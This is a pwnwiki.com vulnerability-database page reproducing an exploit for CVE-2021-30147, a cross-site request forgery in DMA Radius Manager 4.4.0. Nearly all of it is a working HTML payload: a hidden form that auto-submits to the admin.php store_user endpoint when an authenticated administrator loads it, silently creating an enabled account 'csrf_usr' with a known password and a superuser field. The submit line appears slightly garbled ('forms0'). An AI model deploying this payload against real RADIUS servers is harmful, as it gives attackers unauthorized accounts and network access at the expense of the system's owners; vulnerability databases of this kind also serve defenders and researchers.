Loading
0

CVE-2021-30147 DMA Radius Manager 4.4.0 跨站请求伪造(CSRF)

pwnwiki.com

,

EXP

# Exploit Title: DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)
# Date: April 8, 2021 (04/08/2021)
# Exploit Author: Issac Briones
# Vendor Homepage: http://www.dmasoftlab.com/
# Software Download: https://sourceforge.net/projects/radiusmanager/
# Version: 4.4.0
# CVE: CVE-2021-30147

<html>
	<body>
		< ! -- Change IP addr to IP addr that RADIUS manager is located -- >
		<form action="http://192.168.1.2/admin.php?cont=store_user" method="POST">
			<input type="hidden" name="username" value="csrf_usr" />
			<input type="hidden" name="enableuser" value="1" />
			<input type="hidden" name="acctype" value="0" />
			<input type="hidden" name="password1" value="csrfusr" />
			<input type="hidden" name="password2" value="csrfusr" />
			<input type="hidden" name="maccm" value="" />
			<input type="hidden" name="mac" value="" />
			<input type="hidden" name="ipmodecpe" value="0" />
			<input type="hidden" name="simuse" value="1" />
			<input type="hidden" name="firstname" value="" />
			<input type="hidden" name="lastname" value="" />
			<input type="hidden" name="company" value="" />
			<input type="hidden" name="address" value="" />
			<input type="hidden" name="city" value="" />
			<input type="hidden" name="zip" value="" />
			<input type="hidden" name="country" value="" />
			<input type="hidden" name="state" value="" />
			<input type="hidden" name="phone" value="" />
			<input type="hidden" name="mobile" value="" />
			<input type="hidden" name="email" value="" />
			<input type="hidden" name="taxid" value="" />
			<input type="hidden" name="srvid" value="0" />
			<input type="hidden" name="downlimit" value="0" />
			<input type="hidden" name="uplimit" value="0" />
			<input type="hidden" name="comblimit" value="0" />
			<input type="hidden" name="expiration" value="2021-04-06" />
			<input type="hidden" name="uptimelimit" value="00:00:00" />
			<input type="hidden" name="credits" value="0.00" />
			<input type="hidden" name="contractid" value="" />
			<input type="hidden" name="contractvalid" value="" />
			<input type="hidden" name="gpslat" value="" />
			<input type="hidden" name="gpslong" value="" />
			<input type="hidden" name="comment" value="" />
			<input type="hidden" name="superuser" value="{SUPERUSER}" />
			<input type="hidden" name="lang" value="English" />
			<input type="hidden" name="groupid" value="1" />
			<input type="hidden" name="custattr" value="" />
			<input type="hidden" name="cnic" value="" />
			<input type="hidden" name="cnicfile1" value="(binary)" />
			<input type="hidden" name="cnicfile2" value="(binary)" />
			<input type="hidden" name="adduser" value="Add user" />
		</form>
	<script>
		document.forms0.submit();
	</script>
	</body>

</html>

免费、自由、人人可编辑的漏洞库